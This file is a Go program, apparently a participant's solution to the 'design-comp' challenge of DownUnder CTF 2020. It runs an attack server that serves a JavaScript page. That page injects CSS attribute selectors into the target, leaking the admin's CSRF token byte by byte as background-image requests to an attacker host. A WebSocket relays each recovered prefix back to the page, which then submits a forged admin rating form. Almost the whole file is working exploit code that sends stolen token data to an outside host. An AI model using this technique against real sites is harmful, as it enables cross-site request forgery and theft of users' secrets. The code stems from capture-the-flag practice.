My solution for the design-comp challenge in DownUnder CTF 2020
package main | |
import (
	"crypto/tls"
	"log"
	"net/http"
	"time"

	"github.com/gorilla/websocket"
	"golang.org/x/crypto/acme/autocert"
)
var (
	// csrf carries each value received on /csrf to the /ws connection that
	// is currently waiting in wsEndpoint. main creates it with a buffer of
	// one; until then it is nil and any send or receive would block.
	csrf chan string

	// upgrader performs the HTTP -> WebSocket upgrade for /ws.
	// CheckOrigin always returns true, so the Origin header is never
	// compared against this host and the library's default same-origin
	// check is switched off. The page served at "/" and the socket both
	// live on this host, so the override may not actually be needed —
	// TODO confirm before reusing this upgrader elsewhere.
	upgrader = websocket.Upgrader{
		ReadBufferSize:  1024,
		WriteBufferSize: 1024,
		CheckOrigin:     func(_ *http.Request) bool { return true },
	}
)
// payload is the HTML page that hack serves at "/". It is a Go raw string
// literal: the JavaScript inside is not executed by this process but by the
// browser that loads the page, where it connects back to /ws on this host
// and reacts to the messages wsEndpoint sends. The hosts, path and form
// field names it contains are specific to the CTF instance and are never
// read or validated by the Go code.
const payload = `
<html><body><script>
const childwin = window.open('https://chal.duc.tf:30105/playground/fcd3c750-067c-4fa6-97ae-d398e4ff4ef6', 'haha', 'height=300px, width=500px');
setTimeout(function() {
const socket = new WebSocket('wss://demo.nsa.group/ws');
socket.addEventListener('message', async function (event) {
const csrf = event.data;
console.log(csrf);
if (csrf.length < 24) {
var msg = "#rater {display: block !important;}";
for (var i = 0; i < 256; i++) {
var ncsrf;
if (i < 16) {
ncsrf = csrf + "0" + i.toString(16);
} else {
ncsrf = csrf + i.toString(16);
}
msg += "\ninput[value^='" + ncsrf + "'] ~ * ~ * ~ * {background: url(https://demo.nsa.group/csrf?c=" + ncsrf + ") !important;}";
}
childwin.postMessage({action:'preview', css: msg}, '*');
} else {
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://chal.duc.tf:30105/admin/rate';
const csrfField = document.createElement('input');
csrfField.type = 'hidden';
csrfField.name = 'csrf';
csrfField.value = csrf;
form.appendChild(csrfField);
const userField = document.createElement('input');
userField.type = 'hidden';
userField.name = 'user';
userField.value = 'fcd3c750-067c-4fa6-97ae-d398e4ff4ef6';
form.appendChild(userField);
const scoreField = document.createElement('input');
scoreField.type = 'hidden';
scoreField.name = 'score';
scoreField.value = '10';
form.appendChild(scoreField);
document.body.appendChild(form);
form.submit();
}
});
}, 200);
</script></body></html>
`
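// wsEndpoint upgrades the request on /ws to a WebSocket and then relays
// values from the csrf channel to that client, one text message per value.
//
// The first message is always the empty string; after that the handler
// blocks on csrf and forwards each value it receives. Before entering the
// loop it drains one stale value so a new client does not start with a
// leftover from an earlier connection. The handler returns, and closes the
// socket, as soon as a write fails: that is what stops a dead connection
// from keeping a goroutine parked on csrf and swallowing values meant for
// a later client. A peer that disconnects silently is only noticed at the
// next write, since nothing here reads from the socket.
func wsEndpoint(w http.ResponseWriter, r *http.Request) {
	ws, err := upgrader.Upgrade(w, r, nil)
	if err != nil {
		log.Println(err)
		return
	}
	defer ws.Close()
	log.Println("Client Connected")

	// Drop a value left over from a previous connection, if any, without
	// blocking when the buffer is empty.
	select {
	case <-csrf:
	default:
	}

	c := ""
	for {
		// c originates from a request parameter on /csrf; %q keeps a value
		// with newlines or control characters on a single log line.
		log.Printf("Sending %q", c)
		if err := ws.WriteMessage(websocket.TextMessage, []byte(c)); err != nil {
			log.Println(err)
			return
		}
		c = <-csrf
	}
}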
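// stealCsrf is the /csrf handler. It reads the "c" query parameter and
// passes it to the waiting wsEndpoint through the csrf channel.
//
// The value is taken as-is from an unauthenticated request and is not
// validated here. The send is bounded by the request context: if no
// WebSocket client ever drains the channel, the handler gives up when the
// caller disconnects instead of parking this goroutine forever on a full
// buffer.
func stealCsrf(w http.ResponseWriter, r *http.Request) {
	// Only the URL query is read, so there is no need to parse a request
	// body or form.
	c := r.URL.Query().Get("c")
	// c is supplied by the remote client; %q keeps newlines and control
	// characters from forging extra log lines.
	log.Printf("Received %q", c)

	select {
	case csrf <- c:
	case <-r.Context().Done():
		log.Printf("dropping value: %v", r.Context().Err())
	}
}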
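// hack serves the HTML in payload at "/".
func hack(w http.ResponseWriter, r *http.Request) {
	// Set rather than Add: there is never a reason to emit two Content-Type
	// values, and an explicit charset stops the browser from guessing one.
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	if _, err := w.Write([]byte(payload)); err != nil {
		// The client has usually gone away at this point; nothing more can
		// be sent, so just record it.
		log.Println(err)
	}
}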
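// main wires the three handlers onto the default mux and serves them over
// HTTPS, with certificates obtained through autocert for demo.nsa.group.
// A plain-HTTP listener answers the ACME HTTP-01 challenge and redirects
// everything else to HTTPS, which is what HTTPHandler(nil) does.
func main() {
	// Buffer of one: /csrf may hand over a value slightly before /ws is
	// ready to forward it; wsEndpoint drains a stale value on connect.
	csrf = make(chan string, 1)

	http.HandleFunc("/", hack)
	http.HandleFunc("/ws", wsEndpoint)
	http.HandleFunc("/csrf", stealCsrf)

	certManager := autocert.Manager{
		Prompt:     autocert.AcceptTOS,
		HostPolicy: autocert.HostWhitelist("demo.nsa.group"),
		// DirCache keeps the ACME account key and the issued certificate
		// with its private key as files in this directory — here the
		// working directory of the process. Anything else that can read
		// that directory can read the key material; a dedicated directory
		// with restricted permissions is the safer choice.
		Cache: autocert.DirCache("./"),
	}

	server := &http.Server{
		Addr: ":https",
		TLSConfig: &tls.Config{
			GetCertificate: certManager.GetCertificate,
			MinVersion:     tls.VersionTLS12,
		},
		// Bound slow or idle clients. gorilla's Upgrade is expected to
		// clear the per-connection deadlines when /ws hijacks the
		// connection, so these should not cut off an established
		// WebSocket — confirm if sockets start dropping after WriteTimeout.
		ReadHeaderTimeout: 10 * time.Second,
		ReadTimeout:       30 * time.Second,
		WriteTimeout:      30 * time.Second,
		IdleTimeout:       60 * time.Second,
	}

	go func() {
		// Challenge responder and HTTPS redirect; it never serves content
		// of its own, so a header timeout is all it needs.
		challenge := &http.Server{
			Addr:              ":http",
			Handler:           certManager.HTTPHandler(nil),
			ReadHeaderTimeout: 10 * time.Second,
		}
		log.Fatal(challenge.ListenAndServe())
	}()
	log.Fatal(server.ListenAndServeTLS("", ""))
}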